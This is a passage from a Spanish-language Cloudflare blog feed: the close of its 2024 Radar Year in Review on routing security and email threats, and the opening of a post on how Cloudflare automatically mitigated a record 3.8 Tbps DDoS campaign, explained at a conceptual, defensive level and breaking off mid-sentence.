href="https://radar.cloudflare.com/year-in-review/2024#routing-security"><u>global</u></a>, durante 2024 observamos un aumento de 6,4 puntos porcentuales (del 43,4 % al 49,8 %) en las rutas IPv4 válidas, y un aumento de 3,2 puntos porcentuales (del 53,7 % al 56,9 %) en las rutas IPv6 válidas. Dada la trayectoria, es probable que más de la mitad de las rutas IPv4 sean válidas para RPKI a fines del 2024. En cuanto al porcentaje global de espacio de direcciones IP cubierto por rutas válidas, observamos un aumento de 4,7 puntos porcentuales (del 38,9 % al 43,6 %) para IPv4, y de 3,3 puntos porcentuales (del 57,6 % al 60,9 %) para IPv6.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2ojjIa2U45vvsbha8v6ITk/2c61631ded62b80481d47e1da8a5d2cc/security_-_routing_global_valid_routes.png" />
          </figure><p><i><sup>Porcentaje de entradas de enrutamiento válidas de RPKI global por versión de dirección IP en 2024</sup></i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2rCCmsaqULazLsBgoXZLLC/9aa265e9658d71bd7ee113423c6945ca/security_-_routing_global_valid_ip_address_space.png" />
          </figure><p><i><sup>Porcentaje del espacio de direcciones IP anunciadas globalmente cubiertas por rutas válidas de RPKI en 2024</sup></i></p><p><a href="https://radar.cloudflare.com/year-in-review/2024/es#routing-security"><u>España</u></a> comenzó 2024 con menos de la mitad de sus rutas (tanto IPv4 como IPv6) RPKI válidas. Sin embargo, la participación de rutas válidas creció significativamente el 15 de febrero, cuando <a href="https://radar.cloudflare.com/as12479"><u>AS12479 (Orange Espagne)</u></a> firmó registros asociados con el 98 % de sus prefijos de dirección IP que anteriormente estaban en <a href="https://www.ripe.net/manage-ips-and-asns/resource-management/rpki/bgp-origin-validation/"><u> estado "desconocido" (o NotFound) de validez RPKI</u></a>, convirtiendo así estos prefijos de desconocidos a válidos. Esto impulsó un aumento inmediato de IPv4 al 76 %, alcanzando el 81 % de validez el 1 de diciembre, y un aumento inmediato de IPv6 al 91 %, alcanzando el 92,9 % de validez el 1 de diciembre. Un cambio notable en el espacio de direcciones IP cubierto se observó en <a href="https://radar.cloudflare.com/year-in-review/2024/cm#routing-security"><u>Camerún</u></a>, donde el espacio IPv4 cubierto se duplicó con creces a fines de enero, pasando del 32 % al 82 %. Esto se debió a que <a href="https://radar.cloudflare.com/as36912"><u>AS36912 (Orange Cameroun)</u></a> firmó registros asociados con todos sus prefijos de dirección IPv4, cambiando el espacio de direcciones IP asociado a RPKI válido. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5e7SUVIju8fidAEBkIOSq4/2085f3237411eca0816a3d2862e9e3df/security_-_routing_Spain_valid_routes.png" />
          </figure><p><i><sup>La participación de IPv4 e IPv6 en las rutas válidas de RPKI para España en 2024</sup></i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/G9adlberrdCmDnB3MupQa/6c866261fc478334673115d6dd01fd76/security_-_routing_Cameroon_valid_ipv4_address_space.png" />
          </figure><p><i><sup>Participación del espacio de direcciones IPv4 cubierto por rutas válidas RPKI para Camerún en 2024</sup></i></p>
    <div>
      <h2>Seguridad del correo electrónico</h2>
      <a href="#seguridad-del-correo-electronico">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7vC1TSUDDHpepgs2Yv3Lpx/eb43b5c0a203d7ec0a74939c23684ae5/2627_Shield_Plane.png" />
          </figure>
    <div>
      <h3>En 2024, se determinó que un promedio del 4,3 % de los correos electrónicos eran maliciosos. </h3>
      <a href="#en-2024-se-determino-que-un-promedio-del-4-3-de-los-correos-electronicos-eran-maliciosos">
        
      </a>
    </div>
    <p>A pesar del creciente uso aplicaciones de colaboración/mensajería por parte de las empresas, el correo electrónico sigue siendo una importante aplicación empresarial y es un punto de entrada a las redes empresariales muy atractivo para los atacantes. Los atacantes envían correos electrónicos maliciosos que intentan hacerse pasar por un remitente legítimo (como un ejecutivo corporativo) para que el usuario haga clic en un enlace engañoso, o correos electrónicos que contienen un archivo adjunto peligroso, entre otros tipos de amenazas. <a href="https://www.cloudflare.com/zero-trust/products/email-security/"><u>Cloudflare Email Security</u></a> protege a los clientes de los ataques al correo electrónico, incluidos los que se llevan a cabo a través de mensajes de correo electrónico maliciosos selectivos. Durante<a href="https://radar.cloudflare.com/year-in-review/2024#malicious-emails"><u> 2024,</u></a> se descubrió que un promedio del 4,3 % de los correos electrónicos analizados por Cloudflare eran maliciosos. A nivel semanal, se observaron picos superiores al 14 % a fines de marzo, principios de abril y mediados de mayo. Creemos que estos picos estaban relacionados con ataques selectivos de "retrodifusión", en los que el atacante inundaba un objetivo con mensajes imposibles de entregar, que luego rebotaban al destinatario, cuyo correo electrónico se había configurado como la dirección de respuesta.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/693EaEyePShBH8CZ7cZWv1/c08e0acd6f8a6a15b730b1cd90bf6283/email_-_malicious_worldwide.png" />
          </figure><p><i><sup>Tendencias globales de participación de correos electrónicos maliciosos en 2024</sup></i></p>
    <div>
      <h3>Los enlaces engañosos y el fraude de identidad fueron los dos tipos más comunes de amenazas que se encontraron en los mensajes de correo electrónico maliciosos.  </h3>
      <a href="#los-enlaces-enganosos-y-el-fraude-de-identidad-fueron-los-dos-tipos-mas-comunes-de-amenazas-que-se-encontraron-en-los-mensajes-de-correo-electronico-maliciosos">
        
      </a>
    </div>
    <p>Los atacantes utilizan una variedad de técnicas, a las que nos referimos como categorías de amenaza, cuando utilizan mensajes de correo electrónico maliciosos como vector de ataque. Estas categorías se definen y analizan en detalle en nuestro <a href="https://blog.cloudflare.com/2023-phishing-report/"><u>informe sobre las amenazas de phishing</u></a>. En nuestro análisis de los correos electrónicos maliciosos, hemos descubierto que estos mensajes pueden contener varios tipos de amenazas. Al revisar una agregación semanal de las tendencias de la actividad de las amenazas para estas categorías, descubrimos que, en <a href="https://radar.cloudflare.com/year-in-review/2024#top-email-threats"><u>promedio en 2024</u></a>, el 42,9 % de los mensajes de correo electrónico maliciosos contenían enlaces engañosos, y en ocasiones, la proporción alcanzó el 70 % durante el año. La actividad de esta categoría de hilos fue irregular, con puntos bajos en el periodo de marzo a mayo, y una tendencia general a la baja visible desde julio hasta noviembre.</p><p>El fraude de identidad fue una categoría de amenaza igualmente activa, y estas amenazas también se encontraron en hasta el 70 % de los correos electrónicos analizados durante varias semanas durante el año. En promedio, en 2024, el 35,1 % de los correos electrónicos contenían intentos de fraude de identidad. El patrón de actividad de esta categoría de amenaza parece ser algo similar a los enlaces engañosos, con varios picos y valles que se producen durante las mismas semanas. En ocasiones, el fraude de identidad fue una amenaza más frecuente en los correos electrónicos analizados que los enlaces engañosos, como se ve en el gráfico siguiente.</p><p>Entre otras categorías de amenaza, la extorsión experimentó el cambio más significativo durante el año. Tras aparecer en el 86 % de los correos electrónicos maliciosos durante la primera semana de enero, su participación disminuyó gradualmente a lo largo del año, y finalizó noviembre por debajo del 10 %.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/47EGZSEcRbUY67bsnYTSip/81ce3c89beefe1ddbe66f68710366c87/email_-_threat_category.png" />
          </figure><p><i><sup>Tendencias globales de las categorías de amenaza de correos electrónicos maliciosos para los enlaces engañosos y el fraude de identidad en 2024</sup></i></p>
    <div>
      <h3>Más del 99 % de los correos electrónicos procesados por Cloudflare Email Security de los dominios de nivel superior (TLD) .bar, .rest, y .uno resultaron ser spam o maliciosos.</h3>
      <a href="#mas-del-99-de-los-correos-electronicos-procesados-por-cloudflare-email-security-de-los-dominios-de-nivel-superior-tld-bar-rest-y-uno-resultaron-ser-spam-o-maliciosos">
        
      </a>
    </div>
    <p>En marzo de 2024,<a href="https://blog.cloudflare.com/email-security-insights-on-cloudflare-radar/"><u>lanzamos un conjunto de información sobre seguridad del correo electrónico en Cloudflare Radar,</u></a> como la visibilidad de los llamados "dominios peligrosos", aquellos dominios de nivel superior (TLD) que se descubrió que eran el origen de la mayor parte de los mensajes de correo electrónico no deseado o malicioso. analizada por Cloudflare Email Security. El análisis se basa en el TLD del dominio de envío, que se encuentra en el encabezado <code>De</code>: de un mensaje de correo electrónico. Por ejemplo, si un mensaje procede de <code>sender@example.com</code>, entonces <code>example.com</code> es el dominio de envío, y .com es el TLD asociado.</p><p><a href="https://radar.cloudflare.com/year-in-review/2024?#most-observed-tlds"><u>En conjunto, durante 2024</u></a>, observamos que los dominios de nivel superior (TLD) <a href="https://icannwiki.org/.bar"><u><code>.bar</code></u></a>, <a href="https://icannwiki.org/.rest"><u><code>.rest</code></u></a>,y <a href="https://icannwiki.org/.uno"><u><code>.uno</code></u></a> fueron los "más peligrosos", cada uno con más del 99 % de los mensajes de correo electrónico analizados que se caracterizaron como no deseados o maliciosos. (Todos estos TLD existen hace al menos una década, y cada uno tiene al menos algún uso, con <a href="https://research.domaintools.com/statistics/tld-counts/"><u>entre 20 000 y 60 000 nombres de dominio registrados</u></a>).  Ordenar por recurso compartido de correo electrónico malicioso, el <a href="https://icannwiki.org/.ws"><u><code>.ws</code></u></a> El ccTLD (dominio de nivel superior con código de país) perteneciente a Samoa Occidental ocupó el primer lugar, con más del 90 % de los correos electrónicos analizados que se clasificaron como maliciosos. Por porcentaje de correo electrónico no deseado, el dominio <a href="https://icannwiki.org/.quest"><u><code>.quest</code></u></a> es el mayor infractor, ya que más del 88 % de los correos electrónicos que se originan en dominios asociados se caracterizan como correo no deseado.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/30rfi3V9NkY31itUpHQ9is/d1cbb9fce0ecf5a1c3a237f2694c5a13/email_-_dangerous_tlds.png" />
          </figure><p><i><sup>Los TLD que originaron el mayor porcentaje total de correo electrónico malicioso y no deseado en 2024</sup></i></p>
    <div>
      <h2>Conclusión</h2>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>Internet es un organismo increíblemente complejo y dinámico, en constante cambio, crecimiento y evolución.</p><p>Con el <a href="https://radar.cloudflare.com/year-in-review/2024"><u>Resumen del Año 2024 de Cloudflare Radar</u></a>, ofrecemos información sobre el cambio, el crecimiento y la evolución que hemos medido y observado durante el año. Los gráficos de tendencias, los mapas, las tablas y las estadísticas de resumen ofrecen nuestras perspectivas únicas sobre el tráfico de Internet, la calidad y la seguridad de Internet, y cómo las métricas clave de estas áreas varían en todo el mundo y a lo largo del tiempo.</p><p>Te invitamos a visitar el <a href="https://radar.cloudflare.com/year-in-review/2024"><u>micrositio del Resumen del Año 2024 de Cloudflare Radar</u></a> y a que explores las tendencias de tu país/región, y consideres cómo afectan a tu organización para que estés adecuadamente preparado para 2025. Además, para conocer los principales servicios de Internet en distintas categorías del sector, te recomendamos leer la publicación complementaria del blog Resumen del Año, <a href="https://blog.cloudflare.com/radar-2024-year-in-review-internet-services/"><i><u>de ChatGPT a Temu: clasificación de los principales servicios de Internet en 2024</u></i></a>.</p><p>Si deseas hacer preguntas, puedes comunicarte con el equipo de Cloudflare Radar en radar@cloudflare.com o en las redes sociales en <a href="https://twitter.com/CloudflareRadar"><u>@CloudflareRadar</u></a> (X), <a href="https://noc.social/@cloudflareradar"><u>https://noc.social/@cloudflareradar</u></a> (Mastodon) y <a href="https://bsky.app/profile/radar.cloudflare.com"><u>radar.cloudflare.com</u></a> (Bluesky).</p>
    <div>
      <h2>Reconocimientos</h2>
      <a href="#reconocimientos">
        
      </a>
    </div>
    <p>Como cada año, la producción de los datos, el micrositio y el contenido de nuestro Resumen del Año es realmente un trabajo de equipo, quiero agradecer a los integrantes que contribuyeron con la iniciativa este año. Gracias a: Jorge Pacheco, Sabina Zejnilovic, Carlos Azevedo, Mingwei Zhang (Análisis de datos); André Jesus, Nuno Pereira (Desarrollo de front-end); João Tomé (Servicios de Internet más populares); Jackie Dutton, Kari Linder, Guille Lasarte (Comunicación); Eunice Giles (Diseño de marca); Jason Kincaid (Edición del blog); y Paula Tavares (Gestión de ingeniería), así como a muchos otros colegas por sus respuestas, ediciones, apoyo e ideas.</p> ]]></content:encoded>
            <category><![CDATA[Year in Review (ES)]]></category>
            <category><![CDATA[Radar]]></category>
            <category><![CDATA[Tendencias]]></category>
            <category><![CDATA[Tráfico de Internet]]></category>
            <category><![CDATA[Interrupción]]></category>
            <category><![CDATA[Calidad de Internet]]></category>
            <category><![CDATA[Seguridad]]></category>
            <guid isPermaLink="false">4oLkLHLIZ1vibq8dtPJP6F</guid>
            <dc:creator>David Belson</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cómo Cloudflare mitiga automáticamente un ataque DDoS de 3,8 Tb/s, el mayor registrado]]></title>
            <link>https://blog.cloudflare.com/es-es/how-cloudflare-auto-mitigated-world-record-3-8-tbps-ddos-attack/</link>
            <pubDate>Wed, 02 Oct 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ La protección contra DDoS de Cloudflare ha detectado y mitigado de forma automática y con éxito un ataque DDoS de 3,8 terabits por segundo, el mayor jamás registrado, como parte de una campaña de un mes de duración de más de cien ataques DDoS hipervolumétricos a las capas 3 y 4.
 ]]></description>
            <content:encoded><![CDATA[ <p>Desde principios de septiembre, <a href="https://developers.cloudflare.com/ddos-protection/about/components/#autonomous-edge"><u>los sistemas de protección contra DDoS de Cloudflare</u></a> han estado combatiendo una campaña de un mes de duración de ataques DDoS hipervolumétricos a las capas 3 y 4. Las soluciones de protección de Cloudflare mitigaron más de cien ataques DDoS hipervolumétricos a las capas 3/4 a lo largo del mes. Muchos de estos ataques superaron los 2000 millones de paquetes por segundo y los 3 terabits por segundo (Tb/s). El mayor ataque alcanzó un máximo de 3,8 Tb/s, el mayor ataque revelado públicamente por una organización. La detección y la mitigación fueron totalmente autónomas. Los gráficos siguientes representan dos ataques distintos dirigidos al mismo cliente de Cloudflare y que se mitigaron de forma autónoma.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7hXUgmEd37kzZrMs0KPXLl/21a4779022bdff91f760dc66759eb955/BLOG-2586_2.png" />
          </figure><p><i>Un ataque DDoS mitigado de 3,8 terabits por segundo que duró 65 segundos</i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1uxvtlkdFoH6KU6waXxK3o/d17fe7cf0e33c20e64a47b3ca0e6ca63/BLOG-2586_3.png" />
          </figure><p><i>Un ataque DDoS mitigado de 2140 millones de paquetes por segundo que duró 60 segundos</i></p>
    <div>
      <h2>Los clientes de Cloudflare están protegidos</h2>
      <a href="#los-clientes-de-cloudflare-estan-protegidos">
        
      </a>
    </div>
    <p>Los clientes de Cloudflare que utilizan los servicios de proxy inverso HTTP de Cloudflare (por ejemplo, el <a href="https://developers.cloudflare.com/waf/"><u>WAF de Cloudflare</u></a> y la <a href="https://developers.cloudflare.com/cache/"><u>CDN de Cloudflare</u></a>) están protegidos automáticamente.</p><p>Los clientes de Cloudflare que utilizan <a href="https://developers.cloudflare.com/spectrum/"><u>Spectrum</u></a> y <a href="https://developers.cloudflare.com/magic-transit/"><u>Magic Transit</u></a> también están protegidos automáticamente. Los clientes de Magic Transit pueden optimizar aún más su protección implementando reglas de  <a href="https://developers.cloudflare.com/magic-firewall/"><u>Magic Firewall</u></a> para aplicar un estricto modelo de seguridad positiva y negativa en la capa de paquetes.</p>
    <div>
      <h2>Puede que otras propiedades de Internet no estén protegidas</h2>
      <a href="#puede-que-otras-propiedades-de-internet-no-esten-protegidas">
        
      </a>
    </div>
    <p>La escala y la frecuencia de estos ataques no tienen precedentes. Debido a su gran tamaño y sus altas velocidades de bits/paquetes por segundo, estos ataques tienen la capacidad de interrumpir tanto las propiedades de Internet desprotegidas como las propiedades de Internet protegidas por equipos locales o por proveedores en la nube que simplemente carecen de la capacidad de red o de la cobertura global necesarias para gestionar estos volúmenes junto con el tráfico legítimo sin afectar al rendimiento. </p><p>Sin embargo, Cloudflare tiene la capacidad de red, la cobertura global y los sistemas inteligentes necesarios para absorber y mitigar automáticamente estos enormes ataques. </p><p>En esta publicación del blog, revisaremos la campaña de ataques y por qué sus ataques son tan graves. Describiremos la anatomía de un ataque DDoS a la capa 3/4, sus objetivos y cómo se generan los ataques. A continuación, detallaremos cómo los sistemas de Cloudflare fueron capaces de detectar y mitigar de forma autónoma estos enormes ataques sin afectar al rendimiento de nuestros clientes. Describiremos los aspectos clave de nuestras soluciones de protección, desde cómo nuestros sistemas generan firmas en tiempo real (dinámicas) para correlacionar el tráfico de ataque hasta cómo aprovechamos las funciones del kernel para descartar paquetes a velocidad de cable.</p>
    <div>
      <h2>Análisis de la campaña</h2>
      <a href="#analisis-de-la-campana">
        
      </a>
    </div>
    <p>Hemos observado esta campaña de ataques dirigida a varios clientes de los sectores de servicios financieros, Internet y telecomunicaciones, entre otros. Esta campaña de ataques tiene como objetivo saturar el ancho de banda y agotar los recursos de las aplicaciones y los dispositivos en línea.</p><p>Los ataques utilizaron principalmente <a href="https://www.cloudflare.com/learning/ddos/glossary/user-datagram-protocol-udp/"><u>UDP</u></a> en un puerto fijo. Provenían de todo el mundo, pero la mayor parte de ellos procedían de Vietnam, Rusia, Brasil, España y Estados Unidos. </p><p>Los ataques de alta velocidad de paquetes parecen originarse en varios tipos de dispositivos en riesgo, como dispositivos MikroTik, DVR y servidores web, orquestados para trabajar en conjunto e inundar el objetivo con volúmenes de tráfico excepcionalmente grandes. Los ataques de alta velocidad de bits parecen originarse en un gran número de enrutadores domésticos ASUS comprometidos, probablemente explotados mediante <a href="https://censys.com/june-20-improper-authentication-vulnerability-in-asus-routers/"><u>una vulnerabilidad CVE 9.8 (crítica) que Censys descubrió recientemente</u></a>.</p><div>
    <figure>
        <table>
            <colgroup>
                <col></col>
                <col></col>
            </colgroup>
            <tbody>
                <tr>
                    <td>
                        <p><span><span>Rusia</span></span></p>
                    </td>
                    <td>
                        <p><span><span>12,1 %</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>Vietnam</span></span></p>
                    </td>
                    <td>
                        <p><span><span>11,6 %</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>Estados Unidos</span></span></p>
                    </td>
                    <td>
                        <p><span><span>9,3 %</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>España</span></span></p>
                    </td>
                    <td>
                        <p><span><span>6,5 %</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>Brasil</span></span></p>
                    </td>
                    <td>
                        <p><span><span>4,7 %</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>Francia</span></span></p>
                    </td>
                    <td>
                        <p><span><span>4,7 %</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>Rumanía</span></span></p>
                    </td>
                    <td>
                        <p><span><span>4,4 %</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>Taiwán</span></span></p>
                    </td>
                    <td>
                        <p><span><span>3,4 %</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>Reino Unido</span></span></p>
                    </td>
                    <td>
                        <p><span><span>3,3 %</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>Italiano</span></span></p>
                    </td>
                    <td>
                        <p><span><span>2,8 %</span></span></p>
                    </td>
                </tr>
            </tbody>
        </table>
    </figure>
</div><p><sup><i>Porcentaje de paquetes observados por ubicación de origen</i></sup></p>
    <div>
      <h2>Anatomía de los ataques DDoS</h2>
      <a href="#anatomia-de-los-ataques-ddos">
        
      </a>
    </div>
    <p>Antes de analizar cómo Cloudflare detectó y mitigó automáticamente los mayores ataques DDoS jamás vistos, es importante comprender los conceptos básicos de los ataques DDoS. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7HLtAHnyjS33iiJAR1B9h9/2e1fc2cab871440fc95fa803989ae156/BLOG-2586_5.png" />
          </figure><p><i>Diagrama simplificado de un ataque DDoS</i></p><p>El objetivo de un <a href="https://www.cloudflare.com/learning/ddos/what-is-a-ddos-attack/"><u>ataque de denegación de servicio distribuido (DDoS)</u></a> es denegar a los usuarios legítimos el acceso a un servicio. Para ello, los atacantes agotan los recursos que se necesitan para proporcionar el servicio. En el contexto de estos recientes ataques DDoS a las capas 3/4, ese recurso son los ciclos de CPU y el ancho de banda de la red.</p>
    <div>
      <h3>Agotamiento de los ciclos de CPU</h3>
      <a href="#agotamiento-de-los-ciclos-de-cpu">
        
      </a>
    </div>
    <p>El procesamiento de un paquete consume ciclos de CPU. En el caso del tráfico normal (no de ataque), la recepción de un paquete <i>legítimo</i> en un servicio hará que ese servicio realice alguna acción, y distintas acciones requieren distintas cantidades de procesamiento de la CPU. Sin embargo, antes de la entrega de un paquete a un servicio, cada paquete requiere realizar ciertas tareas. Es necesario analizar y procesar los encabezados de los paquetes de la capa 3 para entregar el paquete a la máquina y la interfaz correctas. Los encabezados de los paquetes de la capa 4 deben procesarse y enrutarse al socket correcto (si lo hay). Puede haber varios pasos de procesamiento adicionales que inspeccionen cada paquete. Por lo tanto, si la velocidad de envío de paquetes de un ataque es suficientemente alta, puede potencialmente saturar los recursos de CPU disponibles, por lo que se denegará el servicio a los usuarios legítimos.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3aBbNG4Fc7TY6MTugLl3BE/064fb17761aebbce737a5a4518a14235/BLOG-2586_6.png" />
          </figure><p>Para protegerte contra los ataques de alta velocidad de paquetes, debes poder inspeccionar y descartar los paquetes malos utilizando el menor número posible de ciclos de CPU, dejando suficiente CPU para procesar los paquetes buenos. También tienes la opción de adquirir más CPU, o más rápidas, para realizar el procesamiento, pero ese puede ser un proceso muy largo que conlleva altos costes. </p>
    <div>
      <h3>Agotamiento del ancho de banda de la red</h3>
      <a href="#agotamiento-del-ancho-de-banda-de-la-red">
        
      </a>
    </div>
    <p>El ancho de banda de la red es la cantidad total de datos que se pueden entregar a un servidor cada vez. Puedes pensar en el ancho de banda como un conducto para transportar agua. La cantidad de agua que podemos suministrar a través de una pajita es menor que la que podríamos suministrar a través de una manguera de jardín. Si un atacante es capaz de introducir más datos basura en el conducto de los que este puede entregar, tanto los datos malos <i>como</i> los buenos se descartarán en la parte superior, en la entrada del conducto, y el ataque DDoS habrá logrado su objetivo.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/OehVItOhGfP9ApllRvDDM/fce73e6f375173a1a53bc22026e0b9b1/BLOG-2586_7.png" />
          </figure><p>
La protección contra los ataques que pueden saturar el ancho de banda de la red puede ser difícil porque es muy poco lo que se puede hacer si se está en la parte inferior del conducto saturado. En realidad, tienes muy pocas opciones: puedes conseguir un conducto más grande, puedes encontrar potencialmente una forma de mover el tráfico bueno a un nuevo conducto que no esté saturado o, con suerte. puedes pedir a la parte superior del conducto que deje de enviar algunos o todos los datos al conducto.</p>
    <div>
      <h2>Generación de ataques DDoS</h2>
      <a href="#generacion-de-ataques-ddos">
        
      </a>
    </div>
    <p>Si pensamos en lo que esto significa desde el punto de vista de los atacantes, te darás cuenta de que existen limitaciones similares. Al igual que se necesitan ciclos de CPU para recibir un paquete, también se necesitan ciclos de CPU para crearlo. Si, por ejemplo, el coste de enviar y recibir un paquete fuera el mismo, el atacante necesitaría la misma cantidad de potencia de CPU para generar el ataque que nosotros para defendernos de él. En la mayoría de los casos, esto no es cierto: hay una asimetría de costes, ya que el atacante es capaz de generar paquetes utilizando menos ciclos de CPU de los que se necesitan para recibir esos paquetes. Sin embargo, cabe señalar que la generación de ataques no es gratuita y puede requerir una gran cantidad de potencia de la CPU.</p><p>Saturar el ancho de banda de la red puede ser aún más difícil para un atacante. En este caso, el atacante necesita poder generar más ancho de banda del que ha asignado el servicio de destino. En realidad, necesita poder superar la capacidad del servicio receptor. Esto es tan difícil que la forma más común de lograr un ataque de ancho de banda de red es utilizar un método de ataque de reflexión/amplificación, por ejemplo, un <a href="https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/"><u>ataque de amplificación de DNS</u></a>. Estos ataques permiten al atacante enviar un paquete pequeño a un servicio intermedio, y el servicio intermedio enviará un paquete grande a la víctima.</p><p>En ambos escenarios, el atacante necesita adquirir u obtener acceso a muchos dispositivos para generar el ataque. Estos dispositivos se pueden adquirir de distintas maneras. Pueden ser máquinas de clase servidor de proveedores de nube o servicios de alojamiento, o pueden ser dispositivos en riesgo como DVR, enrutadores y cámaras web que han sido infectados con el malware del atacante. Estas máquinas juntas forman la botnet.</p>
    <div>
      <h2>Cómo Cloudflare protege contra los ataques a gran escala</h2>
      <a href="#como-cloudflare-protege-contra-los-ataques-a-gran-escala">
        
      </a>
    </div>
    <p>Ahora que entendemos los fundamentos de cómo funcionan los ataques DDoS, podemos explicar cómo Cloudflare puede proteger contra estos ataques.</p>
    <div>
      <h3>Ampliación de la superficie de ataque mediante Anycast global</h3>
      <a href="#ampliacion-de-la-superficie-de-ataque-mediante-anycast-global">
        
      </a>
    </div>
    <p>El primer ingrediente no tan secreto es que la red de Cloudflare se basa en <a href="https://www.cloudflare.com/learning/cdn/glossary/anycast-network/"><u>Anycast</u></a>. En resumen, Anycast permite que varias máquinas de cualquier parte del mundo anuncien una única dirección IP. Un paquete enviado a esa dirección IP lo servirá la máquina más cercana. Esto significa que cuando un atacante utiliza su botnet distribuida para lanzar un ataque, el ataque se recibirá de forma distribuida en toda la red de Cloudflare. Un DVR infectado en Dallas, Texas, enviará paquetes a un servidor de Cloudflare en Dallas. Una cámara web infectada en Londres enviará paquetes a un servidor de Cloudflare en Londres.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/48tW6A6ACUT4Fd9h3l70F4/c6bcea8f037fc853477d0987c939e007/BLOG-2586_8.png" />
          </figure><p><i>Redes Anycast vs Unicast</i></p><p>Además, nuestra red Anycast permite a Cloudflare asignar recursos informáticos y de ancho de banda más cerca de las regiones que más los necesitan. Las regiones densamente pobladas generarán mayores cantidades de tráfico legítimo, y los centros de datos ubicados en esas regiones tendrán más recursos de ancho de banda y de CPU para satisfacer esas necesidades. Las regiones escasamente pobladas generarán naturalmente menos tráfico legítimo, por lo que los centros de datos de Cloudflare en esas regiones se pueden dimensionar adecuadamente. Dado que el tráfico de ataque procede principalmente de dispositivos en riesgo, estos dispositivos tenderán a distribuirse de forma que coincida con los flujos de tráfico normales, enviando el tráfico de ataque de forma proporcional a los centros de datos que puedan gestionarlo. De la misma forma, en el centro de datos el tráfico se distribuye entre varias máquinas.</p><p>Además, para los ataques de ancho de banda alto, la red de Cloudflare ofrece otra ventaja. Una gran proporción del tráfico en la red de Cloudflare no consume ancho de banda de forma simétrica. Por ejemplo, una solicitud HTTP para obtener una página web de un sitio detrás de Cloudflare será un paquete entrante relativamente pequeño, pero devolverá una mayor cantidad de tráfico saliente al cliente. Esto significa que la red de Cloudflare tiende a enviar mucho más tráfico legítimo del que recibimos. No obstante, los enlaces de red y el ancho de banda asignado son simétricos, lo que significa que hay mucho ancho de banda de entrada disponible para recibir el tráfico de ataque volumétrico.</p>
    <div>
      <h3>Generación de firmas en tiempo real</h3>
      <a href="#generacion-de-firmas-en-tiempo-real">
        
      </a>
    </div>
    <p>Cuando llegas a un servidor individual dentro de un centro de datos, el ancho de banda del ataque se ha distribuido lo suficiente como para que ninguno de los enlaces ascendentes esté saturado. Eso no significa que el ataque se haya detenido por completo, ya que no hemos descartado los paquetes maliciosos. Para ello, debemos obtener una muestra del tráfico, calificar un ataque y crear reglas para bloquear los paquetes maliciosos. </p><p>El encargado de obtener una muestra del tráfico y de descartar los paquetes malos es nuestro componente <a href="https://blog.cloudflare.com/l4drop-xdp-ebpf-based-ddos-mitigations/"><u>l4drop</u></a>, que utiliza <a href="https://netdevconf.info/2.1/papers/Gilberto_Bertin_XDP_in_practice.pdf"><u>XDP (eXpress Data Path)</u></a> y aprovecha una versión ampliada de Berkeley Packet Filter, <a href="https://blog.cloudflare.com/tag/ebpf/"><u>eBPF (BFP ampliado)</u></a>. Esto nos permite ejecutar código personalizado en el espacio del kernel y procesar (descartar, reenviar o modificar) cada paquete directamente en el nivel de la tarjeta de interfaz de red (NIC). Este componente ayuda al sistema a descartar paquetes de forma eficiente sin consumir excesivos recursos de CPU en la máquina. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1NUxGTvKFs5l6G2UCSxvqw/3632f6728f9361123169d9694c807f0b/BLOG-2586_9.png" />
          </figure><p><i>Descripción general del sistema de protección contra DDoS de Cloudflare</i></p><p>Utilizamos XDP para muestrear los paquetes y buscar atributos sospechosos que indiquen un ataque. Las muestras incluyen campos como la dirección IP de origen, el puerto de origen, la dirección IP de destino, el puerto de destino, el protocolo, los indicadores TCP, el número de secuencia, las opciones, la velocidad de paquetes y más. Este análisis lo realiza el <i>daemon de denegación de servicio (dosd). Dosd</i> es nuestro ingrediente secreto. Tiene muchos <i>filtros</i> que le indican, en función de nuestra heurística seleccionada, cuándo iniciar la mitigación. Para nuestros clientes, estos filtros se agrupan lógicamente por vectores de ataque y se exponen como <a href="https://developers.cloudflare.com/ddos-protection/managed-rulesets/"><u>reglas administradas de DDoS</u></a>. Nuestros clientes pueden <a href="https://developers.cloudflare.com/ddos-protection/managed-rulesets/adjust-rules/"><u>personalizar su comportamiento</u></a> en cierta medida, según sea necesario.</p><p>Conforme recibe muestras de XDP, dosd generará múltiples permutaciones de huellas digitales para detectar patrones de tráfico sospechosos. A continuación, mediante un algoritmo de transmisión de datos, dosd identificará las huellas digitales óptimas para mitigar el ataque. Una vez calificado el ataque, dosd insertará una regla de mitigación en línea como un programa eBPF para descartar quirúrgicamente el 